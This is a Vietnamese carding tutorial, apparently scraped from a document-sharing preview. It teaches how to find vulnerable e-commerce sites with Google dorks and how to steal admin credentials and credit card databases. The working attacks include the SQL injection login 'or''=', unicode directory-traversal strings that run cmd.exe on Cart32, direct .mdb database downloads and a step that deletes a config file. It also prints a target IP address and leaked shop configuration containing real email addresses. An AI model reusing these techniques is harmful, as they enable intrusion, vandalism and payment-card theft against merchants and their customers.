TUTORIAL FORM jonnyhackstuff
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (296.12 KB, 5 trang )
TUTORIAL FORM jonnyhackstuff
Mức độ nguy hiểm : khá cao
tỷ lệ thành công :80%
Tool :+ site />+ PC của bạn cài Access ( dùng để xem file .mdb)
Hiện các Shop DUpaypal rất nhiều và hàu như chưa fix được mấy bằng chứng là tấn công 10 site thì 8 site dính :D)
Tiến hành:
Lên Search với từ khóa "Powered by DUpaypal -siteduware.com"
bạn sẻ thấy rất nhiều site dính Bug này, Chọn victim để test nào
ở đây kieptinhchung chọn cái này:
/>bi giờ thêm vào sau Nó :
../_private/DUpaypal.mdb
để Dowload file chứa thông tin về U/P của Admin về , tức là ta sẻ dùng link sau để dowload nó:
/>sau khi dowload về bạn sẻ xem Nó dưới dạng Accees, tìm phần User và lấy user+pass đăng nhập
thật dễ dàng , như vậy là bạn đã làm chủ Shop đó roài đó.
TUTORIAL BY HCEGROUP
I-Lỗi Tek9.asp :
Cách thức tìm : Dùng Google
Câu tìm kiếm : tek9.asp
Kết quả : Bạn tìm các trang web hiện lên , ví dụ làhttp://198.170.250.68/ tek9_login.asp
Bạn sẽ thêm intranet trước tek9.asp
http://198.170.250.68/intranet/tek9_login.asp
Được gì ? Bạn vào trang đăng nhập của người quản trị.
Tên và mật khẩu : Đều là 'or''='
Sau đó ? Bạn tự tìm hiểu vì mỗi trang có 1 sự trình bày hơi khác nhau. Trang trên cho phép bạn quản lý thông số ,
kiểu , cách thức và vài chỗ có liên quan đến cơ sở dữ liệu chứa thẻ tín dụng. Ngòai ra bạn có thể tìm lệnh Find orders
để truy tìm khu vực chức thẻ.
============================
II-Lỗi Cart32 v3.5a
Cách thức tìm : Dùng Google
Câu tìm kiếm : Cart32 v3.5a
Kết quả : Chạy các trang web có tập tin cart32.exe . Bạn sẽ nhận được 1 số thông tin
Được gì ? Chưa được gì hết
Tên và mật khẩu : Không cần
Sau đó ? Giả sử bạn kiếm được trang web sau có lỗi
/>Bạn thay từ card32.exe bằng những dòng sau đây :
I)
..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
II)
..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
III)
..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
Ví dụ :
/>-Nếu không chuyện gì xảy ra thì bạn thêm dòng địa chỉ sau vào cuối cùng để lấy thẻ tín dụng :
\progra~1\MWAInc\Cart32\
-Bạn sẽ thấy những dòng giống như sau :
2814659000-001001.c32
2814659000-001002.c32
2814659000-001003.c32
-Bây giờ tất những gì cần phải làm là bạn thêm 1 trong ba hoặc thử thì dùng từng cái vào cuối địa chỉ trên. Sau cùng ta
sẽ có giống như thế này :
/>\Cart32\2814659000-001001.c32
============================
III-Lỗi Commerce.cgi
Cách thức tìm : Dùng Google
Câu tìm kiếm : Commerce.cgi
Kết quả : Chạy các trang web có tập tin Commerce.cgi. Giả sử bạn kiếm được trang web sau có lỗi
/>Bạn thay từ commerce.cgi bằng admin_files/commerce_user_lib.pl
Ví dụ :
/> Bạn sẽ nhận được 1 số thông tin :
$sc_sales_tax = ".0825";
$sc_sales_tax_state = "NY";
$sc_send_order_to_email = "yes";
$sc_order_log_name = "onlinebookstore.log";
$sc_send_order_to_log = "yes";
$shipping_percentage = ".15";
$sc_order_email = "wrl\@igc.org";
$sc_root_url = " />$sc_admin_email = "lit\@warresisters.org";
$sc_domain_name_for_cookie = ".warresisters.org";
$sc_order_script_url = " />$sc_root_web_path = "/home/serve/resist/Html/Products";
$sc_path_for_cookie = "/store";
$path_to_html = "../Html";
1;
Được gì ? 1 số thông tin quan trọng về cơ sở dữ liệu
Tên và mật khẩu : Không cần
Sau đó
Xóa cái commerce_user_lib.pl đi thay bằng dòng chữ tìm ở $sc_order_log_name và ....
============================
III-Lỗi shopdisplaycategories
Cách thức tìm : Dùng Google
Câu tìm kiếm : shopdisplaycategories
Kết quả : Trong link các trang bị lỗi , bạn thay shopdisplaycategories.asp thành shopdbtest.asp
Được gì ? Bạn biết được đường dẫn để tải cơ sở dữ liệu Thẻ Tín Dụng
Tên và mật khẩu : Không cần
Sau đó : Thay shopdbtest.asp bằng phần trả lời của xdatabase ( bạn tìm ở phía trên )
============================
IV-Lỗi SQL Injection
Cách thức tìm : Dùng Google
Câu tìm kiếm : admentor
Kết quả : Bạn vào trang bị lỗi , đăng nhập với Username và Password là 'or''='
Được gì ? Bây giờ bạn nắm mọi họat động quản lý của website trong vai Admin
Tên và mật khẩu : 'or''='
Sau đó : Bạn tự tìm hiểu
============================
IV-Lỗi datasources
Cách thức tìm : Dùng Google
Câu tìm kiếm : datasources/ hay config/datasources/
Kết quả :Đường dẫn những trang bị lỗi này
Được gì ? Từ đây bạn thêm vào expire.mdb vào sau datasources/ hay config/datasources/
Tên và mật khẩu : Không cần
Sau đó : Bãn tải được kho dữ liệu có credit card
